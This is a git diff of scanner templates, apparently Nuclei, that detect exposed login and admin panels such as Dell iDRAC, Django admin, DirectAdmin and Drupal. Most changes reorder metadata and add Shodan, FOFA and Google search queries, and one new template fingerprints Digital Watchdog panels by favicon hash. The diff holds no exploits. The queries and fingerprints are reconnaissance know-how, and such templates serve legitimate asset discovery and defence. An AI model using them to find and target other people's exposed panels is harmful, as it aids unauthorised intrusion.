a/http/exposed-panels/dell-idrac.yaml b/http/exposed-panels/dell-idrac.yaml index 5de5884a50..031722167e 100644 --- a/http/exposed-panels/dell-idrac.yaml +++ b/http/exposed-panels/dell-idrac.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"thisIDRACText" - verified: true tags: panel,idrac,dell,detect http: @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202bf3ea14a9c4138e2fb9a81688d600b8a79899eba950245fdcb458e3f8650f30022010fd51f875040c70b57cf8744e4a3fdb13ac80c3c0e4ff60eb1f3ec1c1217ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f19401ef584e1f28c0d43d48d3e5c0f6a4577585f68c45e992e16ce27830a435022100e0644cd117d53f5d8b2efe9b6d5970335c28dc503ba0f6143cb14f1570b19a71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dell-wyse-login.yaml b/http/exposed-panels/dell-wyse-login.yaml index 61562d6654..0a25b50ca9 100644 --- a/http/exposed-panels/dell-wyse-login.yaml +++ b/http/exposed-panels/dell-wyse-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:dell:wyse_management_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: wyse_management_suite vendor: dell + product: wyse_management_suite tags: panel,dell,login http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203f4caaf94dc0d326d2978f06944ac7003b6145bf0d7e9f0275b17ada6f97b3d702201226515a561b0f3e7b0718077765f3c93228937829b278ebc2dacf41fc899b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b558abceea7e76be9fc8ebaa7bb5992a0ee08e00c8d61e92bf1463df755b689022100a569c626dda03070956c6af0e608f978aa886fab47706b4e109d8c9b94331665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/deluge-webui-panel.yaml b/http/exposed-panels/deluge-webui-panel.yaml index 9de52a2976..d4bbb82319 100644 --- a/http/exposed-panels/deluge-webui-panel.yaml +++ b/http/exposed-panels/deluge-webui-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:deluge-torrent:deluge:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: deluge - shodan-query: title:"Deluge WebUI" - vendor: deluge-torrent verified: true + max-request: 1 + vendor: deluge-torrent + product: deluge + shodan-query: + - title:"Deluge WebUI" + - http.title:"deluge webui" + fofa-query: title="deluge webui" + google-query: intitle:"deluge webui" tags: panel,deluge,deluge-torrent http: @@ -39,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e8380fd8ca17e6b81ea0c63b0153114e70dc964189867755c139cfea4986c0102204afe490ccab285f4d497bb0ddf995b96d149082aa55339b0dcb7148eb7132f10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8a1d367725f5e2ff200bd8a3fa5bba10fc9f59bc7355927e8fdc45086681981022100ffa17d8e88c086dd7643fbd295adf615b01a660df126c99e7fdefbe2c83127a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/digital-watchdog-panel.yaml b/http/exposed-panels/digital-watchdog-panel.yaml new file mode 100644 index 0000000000..157982f636 --- /dev/null +++ b/http/exposed-panels/digital-watchdog-panel.yaml @@ -0,0 +1,28 @@ +id: digital-watchdog-panel + +info: + name: Digital Watchdog - Detect + author: ritikchaddha + severity: info + description: | + Digital Watchdog panel was detected. + metadata: + verified: true + max-request: 2 + shodan-query: "http.favicon.hash:868509217" + fofa-query: "icon_hash=\"868509217\"" + tags: digital-watchdog,panel,detect,login,dw,spectrum + +http: + - method: GET + path: + - "{{BaseURL}}/static/images/favicon.ico" + - "{{BaseURL}}/static/customization/favicon.ico" + + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - "status_code==200 && ('868509217' == mmh3(base64_py(body)))" +# digest: 4b0a00483046022100d1f23915bf024abbabe02e6d8a4b82700223be9f6816a82e0f35d56c1ba865c50221009dd7d20893e6ccd9247144899ba2714f4d97e4e4872ba86dc0b02cd3b17ca2e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/digitalrebar-login.yaml b/http/exposed-panels/digitalrebar-login.yaml index 6243172669..208c18ef74 100644 --- a/http/exposed-panels/digitalrebar-login.yaml +++ b/http/exposed-panels/digitalrebar-login.yaml @@ -14,8 +14,8 @@ info: cpe: cpe:2.3:a:rackn:digital_rebar:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: digital_rebar vendor: rackn + product: digital_rebar tags: rackn,digitalrebar,panel http: @@ -38,4 +38,4 @@ http: part: body words: - 'Digital Rebar' -# digest: 4a0a00473045022100b7019f931e0fafef9e3ab6a9ca6b4b18a7e78e84002ed960a63b446be12fa0f802204a07e0cb558a25332bae48c53c5d6929e4a06af223cd2a1c0e8e3e8841108a84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022069d475d274e6c032708d081fd96eb2cd1fb0ea38f121fc4d0874c9103ee97da90221009e17ea6f320f6ced62d41055d2e377963aa246de23daa1eac2fae684620ae5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/directadmin-login-panel.yaml b/http/exposed-panels/directadmin-login-panel.yaml index e6c6ae6b56..1d4f87418e 100644 --- a/http/exposed-panels/directadmin-login-panel.yaml +++ b/http/exposed-panels/directadmin-login-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:directadmin:directadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: directadmin - shodan-query: title:"DirectAdmin Login" vendor: directadmin + product: directadmin + shodan-query: + - title:"DirectAdmin Login" + - http.title:"directadmin login" + fofa-query: title="directadmin login" + google-query: intitle:"directadmin login" tags: panel,directadmin http: @@ -32,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009b0b25b6ff69ffbfc0bbf0190c5116227080c11ee24d3c781aca2dd27922f08802204832455ae36d57ccffc3f7a8928edc69db5f8c940eba343bd2424d0e3967c177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066fd81f2a893f8499a68839023a5fdc4974f045566c63123b11000f5ed581ff402206945756a8f863d190a9512efc643dac9fda1a98437cb25545f8bcf0783a314b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/directum-login.yaml b/http/exposed-panels/directum-login.yaml index 5768af5e60..120816bcde 100644 --- a/http/exposed-panels/directum-login.yaml +++ b/http/exposed-panels/directum-login.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="Directum" max-request: 1 + fofa-query: title="Directum" tags: directum,panel http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204e7fa486ab9fe23fad046847f5d53c5d885817c3e11c39aba52f8501fc6355980220246a1eae600ad33e7563765911781b9394d418069ad69f5260f87dc87cba093b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100905eb3c031666559f9fc3152d9969edafa77f3e939bc4fbb79210e608dec1ac8022100a7c3633d4fa725c729c7cd4293beae25593003903f16a63cc37f2dc06f194681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/discuz-panel.yaml b/http/exposed-panels/discuz-panel.yaml index 72429237ba..6750b892c9 100644 --- a/http/exposed-panels/discuz-panel.yaml +++ b/http/exposed-panels/discuz-panel.yaml @@ -5,10 +5,10 @@ info: author: ritikchaddha severity: info metadata: - fofa-query: title="Discuz!" + verified: true max-request: 1 shodan-query: title:"Discuz!" - verified: true + fofa-query: title="Discuz!" tags: panel,discuz,detect,login http: @@ -35,4 +35,4 @@ http: group: 1 regex: - 'X([0-9.]+)<\/em><\/p>' -# digest: 4b0a00483046022100be5ff986d400ea8da1ee84a8424a628e7b296c1a491dc2eb9d7e0ccfd4dd1d5d022100f361a42383aedcf586525ab02aa9f2e70fb5ca56764fe2ac99105ca1ebb9111b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097a74f17ffb2b4e647c84c9056f480dab7093104577773000185b34a1ab7054e0221008c8448bbe03ed2c17134c6cf727d1625726145b2a3046bd08104430ff5020e48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/django-admin-panel.yaml b/http/exposed-panels/django-admin-panel.yaml index 3d18400e9f..68745145ed 100644 --- a/http/exposed-panels/django-admin-panel.yaml +++ b/http/exposed-panels/django-admin-panel.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: django vendor: djangoproject + product: django + shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: panel,django,python,djangoproject http: @@ -26,4 +27,4 @@ http: - "Django administration" condition: and part: body -# digest: 4a0a00473045022100b9e459a2e2410686287e59d497114f4c41e2e31fa4936194483560ddb48bce1402207c756b1c2321fc279db6302f3aec2c33ee64d8bf2b26bc4771fc32baff98bb64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac02c54225e975d3158eb41af01a31c5140aed18e7d38914fc03d73c3f52e4f1022046df2c0f2c1ac45625152b39485a91c7dc569d88b0b24fc5349d458d836c7961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/docebo-elearning-panel.yaml b/http/exposed-panels/docebo-elearning-panel.yaml index 5454ee7885..c9a1cb0bf7 100644 --- a/http/exposed-panels/docebo-elearning-panel.yaml +++ b/http/exposed-panels/docebo-elearning-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="Docebo E-learning" - max-request: 1 verified: true + max-request: 1 + fofa-query: title="Docebo E-learning" tags: panel,docebo http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010bd0422bd48230d9f4b376bfd14fc999a6f290389c40d18d79c6e60d6d5ecc7022100ea449a06b2e0b39439d0e310f6b2233582a7a21589db52c6134fe148719018d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032c2d41fe6ab303a2af0be0252600a10441157240717877684003563cb062e09022013427980fce1b8f2e1f41d4bd2854b07cf35c046bc7c8f4877a097a3e09d9256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dockge-panel.yaml b/http/exposed-panels/dockge-panel.yaml index 7b2c54506c..c8c5d5c30f 100644 --- a/http/exposed-panels/dockge-panel.yaml +++ b/http/exposed-panels/dockge-panel.yaml @@ -10,10 +10,11 @@ info: - https://github.com/louislam/dockge - https://dockge.kuma.pet/ metadata: + verified: true max-request: 1 shodan-query: title:"Dockge" - verified: true tags: panel,dockge,login + http: - method: GET path: @@ -31,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204bfb0d756bbd4a6b566856fecccaf2bd87003970a4afc29eb638d47ff5ae7ebd022100eb52dee7c3836cf4234eb7e49b658e8acf3015615ba8fb8fd8ab06883e82d145:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009639716a39823e9a7e7895688e60297f842a7d12089c33d36bcff589276a41b7022100cfd4bad60cabb91146dafe8f4e136a70c408b803149d8d77bdf1a1f3532a939b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dokuwiki-panel.yaml b/http/exposed-panels/dokuwiki-panel.yaml index 67610dfb38..75c81600a6 100644 --- a/http/exposed-panels/dokuwiki-panel.yaml +++ b/http/exposed-panels/dokuwiki-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.dokuwiki.org/dokuwiki metadata: + verified: true max-request: 1 shodan-query: http.html:"/dokuwiki/" - verified: true tags: panel,dokuwiki,login http: @@ -25,4 +25,4 @@ http: - 'status_code == 200' - 'contains_any(body, "dokuwiki__header", "content=\"DokuWiki", "/dokuwiki/")' condition: and -# digest: 4a0a0047304502205cf03bfe13c982579e2351db963145e343a76c28ffb173d4d42d464a123b658f022100c98770a8909d655ab6cc1a4ba8bcda6d998d0309715c6d932122ec77151e2c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210098f8ad2f891fcec698d9ee9905ad409416c125e1d7ee9677e68b884c3b046d38022100d49af03fbf040d2dbcc1421f61270a2c03c143b8b47897c4660a5633a78b1ed7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/doris-panel.yaml b/http/exposed-panels/doris-panel.yaml index 0d8470894c..2048801147 100644 --- a/http/exposed-panels/doris-panel.yaml +++ b/http/exposed-panels/doris-panel.yaml @@ -6,9 +6,9 @@ info: severity: info description: Doris panel detection template. metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:24048806 - verified: true tags: doris,panel,login,detect http: @@ -28,4 +28,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210082f87c0a59997b9777291daf69ace181c11f924a7ab9ccc20ba6827a5571a0f4022100caf9db11a109351159c3345fe8687446524df194cdcd624afbd0301a0c97d3d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bd68dfe5d1e6c61141aafdf31b9017aafb7b3327c6d0624083b99a164c801806022024d35f5c9e4860e4d8316fbcabc0eae8c139454fc8efc1ac853b5c130784f593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dotclear-panel.yaml b/http/exposed-panels/dotclear-panel.yaml index 587c582458..7dc4d26b05 100644 --- a/http/exposed-panels/dotclear-panel.yaml +++ b/http/exposed-panels/dotclear-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:dotclear:dotclear:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: dotclear - shodan-query: http.title:"Dotclear" vendor: dotclear + product: dotclear + shodan-query: + - http.title:"Dotclear" + - http.title:"dotclear" + fofa-query: title="dotclear" + google-query: intitle:"dotclear" tags: panel,dotclear http: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220614691a796df81e290377dc18a603b7949eb9aaf0e430d5548007cdbe6a23f6a02201025f6927189a5ac6d70f970de2a8e43ca0996c2b31dcbecbab437ca8725c251:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220659024b348e587f9c1eb76d8d31a1e7ea35bf978289bb79dba5d69385f76bbb4022100ae8e9b4ff9a0f9df3eb379220094550a19a5c554358575713ede6675020d6fdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dotcms-admin-panel.yaml b/http/exposed-panels/dotcms-admin-panel.yaml index 5a42ed97af..edf610792d 100644 --- a/http/exposed-panels/dotcms-admin-panel.yaml +++ b/http/exposed-panels/dotcms-admin-panel.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: dotcms vendor: dotcms + product: dotcms + shodan-query: http.title:"dotcms" + fofa-query: title="dotcms" + google-query: intitle:"dotcms" tags: panel,dotcms,cms http: @@ -25,4 +28,4 @@ http: - type: word words: - 'dotCMS Content Management Platform' -# digest: 4a0a004730450220562634635875c92a53a45561d73ef512768b6048df155652771d7e090a1a93cc022100fe074d6bb787b158b91bd2d64f4986c4af7b6cf18059b8c81966fbbefd0cc01c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebd16e591f3b58ebb21454f0eac68f2742c7d3b162ec265e70a4cb54454fa5ce0220429eb74d1115fc7a6f0edcdd8961b515561025b17678bb0b0854425ce863aa6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dplus-dashboard.yaml b/http/exposed-panels/dplus-dashboard.yaml index 132729ee36..04fd3cccaf 100644 --- a/http/exposed-panels/dplus-dashboard.yaml +++ b/http/exposed-panels/dplus-dashboard.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"DPLUS Dashboard" - verified: true tags: panel,dplus,exposure http: @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022067ac049abe607a28672218ae4b71b08db3d3cb65ffdf822305da0e69103a68f902203e95f96212d73e6e356204d5eba791651e9fe196692ef14ac667a96f606d0449:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001b568167d9213af903edc7551be9a57eae28353681e086dbcc32277eec715f5022100e1854ac6b8eb037d7eb0f22d52b7b3dc7b5b382e03ca4fb235f6f20faeac8607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dqs-superadmin-panel.yaml b/http/exposed-panels/dqs-superadmin-panel.yaml index 74f5cf2875..1726e57ce3 100644 --- a/http/exposed-panels/dqs-superadmin-panel.yaml +++ b/http/exposed-panels/dqs-superadmin-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"DQS Superadmin" - verified: true tags: panel,dqs,superadmin http: @@ -28,4 +28,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022072e688cc448670c7fc479d5bb87d73cb612fa32074ffe89cbb2a10fb5b063dc3022100ac20f23ecc34ece15b920f92f6a3c866f90b86e8cabc93a391f107648e5ea7d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee714cbdb7c3c49ffc61a5c5bd68d155a548f453d5ccf9a32704089a84e622cd0220379cd4757f04fa3db23af58a79afcc1ced8c3cad222c6f0329b921ccddcfa4c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dradis-pro-panel.yaml b/http/exposed-panels/dradis-pro-panel.yaml index 9ec2e9828b..e13e172f2d 100644 --- a/http/exposed-panels/dradis-pro-panel.yaml +++ b/http/exposed-panels/dradis-pro-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Dradis Professional Edition" - verified: true tags: panel,dradis http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0bff71141bdee950ac6ad50149049d720d9e7fa095b05919b15a01127ee782d02202216570cd21edd333080c08f0eed32b2d2c987a457f3249cf0c9e3df6e8b2c49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100804c41629c7df6973f57cde7de7a3fc5c6b111b7bbc65c9a48164c05490d9883022100dad881ab36d15504a3d75206020349b45fbd087d124cb6c81d8bba9b00faffae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/drawio-flowchartmaker-panel.yaml b/http/exposed-panels/drawio-flowchartmaker-panel.yaml index a0826f7469..15b3eab5a2 100644 --- a/http/exposed-panels/drawio-flowchartmaker-panel.yaml +++ b/http/exposed-panels/drawio-flowchartmaker-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: drawio - shodan-query: http.title:"Flowchart Maker" - vendor: diagrams verified: true + max-request: 1 + vendor: diagrams + product: drawio + shodan-query: + - http.title:"Flowchart Maker" + - http.title:"flowchart maker" + fofa-query: title="flowchart maker" + google-query: intitle:"flowchart maker" tags: panel,drawio,oss,diagrams http: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022028012c9ed9aa191524ee962f7289a19da18537353af37d7c0c38a6015df3ef35022100c4cf24f3d62c62df742b4e14c4efdedce01db38d05b430d47daada8716c908f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210084da5a68a171c77891dfb9d34e04344f6ffa29ce2c77b514b3904598295199cb02203fc8ed38696651bd6696d85b2dcfe18cfa2b6f51f72068bafda586318e690293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/druid-console-exposure.yaml b/http/exposed-panels/druid-console-exposure.yaml index 4ba687a5c0..b53136a90f 100644 --- a/http/exposed-panels/druid-console-exposure.yaml +++ b/http/exposed-panels/druid-console-exposure.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:alibaba:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: druid vendor: alibaba + product: druid tags: panel,alibaba,druid http: @@ -26,4 +26,4 @@ http: - 'src="/druid.js"' - 'href="/druid.css"' condition: and -# digest: 4a0a00473045022100d4161cb16b1fa1f75f4a71ed8c2f35300ac1be66eacf7805dc92cc60896f158e0220057cafb07518bb1637590061583db933b70472dd2f94a66a1086bc19190d2194:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb1f35bddc35d199774f3292212f8a13aa8946eb0be751b46d081e3fffdb0d0302207c53c99b6fac30e1fdefe278a45d4821d9c0809f8e69f48e57b5cfc585101c37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/druid-panel.yaml b/http/exposed-panels/druid-panel.yaml index 4ccebd1fca..3ea4f976d2 100644 --- a/http/exposed-panels/druid-panel.yaml +++ b/http/exposed-panels/druid-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: druid vendor: apache + product: druid tags: panel,druid,apache http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d7185770da29b4b8a20493cdc0d8823e1e11c959b10956de5d45638d1a86f5fd022051801ed3d7cae82a52990d3c26dec63b321aaa3b464c991d959033f5185b9154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201db8ebbf0b73b84a4ffd48e4975d25db2ec157948da269339398d12a93244002022010db034fb050c05c55fd2f7140bdd794832f87f8ce3a6bcc82d8dc03a904142d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/drupal-login.yaml b/http/exposed-panels/drupal-login.yaml index 265533e4a6..d73ef9a949 100644 --- a/http/exposed-panels/drupal-login.yaml +++ b/http/exposed-panels/drupal-login.yaml @@ -11,9 +11,11 @@ info: cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: drupal - shodan-query: http.component:"drupal" vendor: drupal + product: drupal + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: panel,drupal http: @@ -39,4 +41,4 @@ http: - '(?i)x-drupal' - "(?i)x-generator: drupal" condition: or -# digest: 4a0a004730450221008041029adacd7fec040783fac0c48a716cebd4fc13de47ce5d09bc89a02618c0022028204ca76bc5716fa67df5b1a8cff3703885087e123148cf12a91cca8e01503b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008fdf2cb9d64b8de987b2e471dcd2a56510fbac1a8d4437cf7a85a07304c5c524022100ad0973ec6bb48acc2c6969522b15354c111d0581968029cf044e6a4fd027e1e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dxplanning-panel.yaml b/http/exposed-panels/dxplanning-panel.yaml index aaf6781ecb..eeb66f2aab 100644 --- a/http/exposed-panels/dxplanning-panel.yaml +++ b/http/exposed-panels/dxplanning-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.dedalus.com/fr/wp-content/uploads/sites/13/2022/05/Catalogue-formations-DxCare-2022.pdf metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,dxplanning,login,detect http: @@ -33,4 +33,4 @@ http: group: 1 regex: - '([0-9.]+)' -# digest: 4b0a004830460221008ebd5b0fb933eaf872a0f11c39bce6716f16179f11abe13ee7283cc270cf5f5d022100fab7cdc658b1440b7a3415d75308f81052fa808e09397d91894a07f570bd5a80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a13a6ac9969d90ab892c59684f5e2c90d64ec9392c10f2f65a19ebb223af9d9e0220640dabae7d57d8c9a20d025f892d806503e1ee9bd1c1206417a13387885f4d69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dynatrace-panel.yaml b/http/exposed-panels/dynatrace-panel.yaml index f22700791f..5be2ca6502 100644 --- a/http/exposed-panels/dynatrace-panel.yaml +++ b/http/exposed-panels/dynatrace-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1828614783 - verified: true tags: dynatrace,login,panel http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f90ceda6fefe82988a3b4aeff26255be542eaaab02ae0197973537f44a588219022035aabf38ef0b3067367bf7c5dad8551adbe76efdb6e7ffacb01ced9f2c3073ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ef83ad4c2eec6ec56c1d30e32a4ce5eb70005027ab052cc209bb35f0edb4b3f02207f20e03c0fd6b55c43bdde96862e1b4a500189679c5d930c823c7c90261f2f6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml index 78fd8a55e3..e28dcee38c 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -11,12 +11,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:dzzoffice:dzzoffice:*:*:*:*:*:*:*:* metadata: - fofa-query: title="dzzoffice" + verified: true max-request: 1 + vendor: dzzoffice product: dzzoffice shodan-query: http.favicon.hash:-1961736892 - vendor: dzzoffice - verified: true + fofa-query: + - title="dzzoffice" + - icon_hash=-1961736892 tags: panel,dzzoffice,install http: @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207dd82cd9d805d495ca7962bd7a3699a412ef812f1406c9629c55e9008ee9db0e022100a1225e35ce7578267c2dd552b0e902d13bfd1c33ecb3e59c69e3a815729c1779:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fdcd161621a7550c8ad7d5f6b6893aa35b0de446af2d34f987ef1fac67dd32cc022100c45d20e969123f42ba7e01c55465442e2c88e307a46c2c6cd66d83dfcc2f6d2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml index b43211cc4a..e8531b79b6 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml @@ -9,9 +9,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.favicon.hash:-1961736892 - verified: true + product: dzzoffice + vendor: dzzoffice + fofa-query: + - title="dzzoffice" + - icon_hash=-1961736892 tags: dzzoffice,panel http: @@ -38,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022068e466b86e791e28057963f2c8636e6051bab39501a4a396e536936237c4cc3a022009c50cc2f760de82e4ffd2d8415301ea2c7eae1a73f697d0a808c0c3d489ea9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb11cfe9200ab3c8e94d354c6cde46b664f689beecd15438c3e4f17e43374dd8022100fe1acb9b15e4c7a1fa788e7dbc48a66a6bd701bf2b68e18adde15842b6c90db2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/e-mobile-panel.yaml b/http/exposed-panels/e-mobile-panel.yaml index a8478f1f9e..94458dafb8 100644 --- a/http/exposed-panels/e-mobile-panel.yaml +++ b/http/exposed-panels/e-mobile-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.html:"E-Mobile " - verified: true tags: panel,e-mobile http: @@ -42,4 +42,4 @@ http: group: 1 regex: - 'E-Mobile ([0-9.]+)' -# digest: 4a0a004730450220599a70a5aff401b58e64cf860b49ffb239612df8095a17f20e8d458e888f6d09022100ee2dda6d825ac7c63fbc6f8755aa31b1457a5fdad9f57e5a27f2798031f87105:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aa885928d69f48a7b882e431890f950f61523757f0861862db63ca92f2cf2b6d022100da46abadbe7dccf260371baa3ef481acda21cb2ee306ec7bfd957c4328cc6446:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/eMerge-panel.yaml 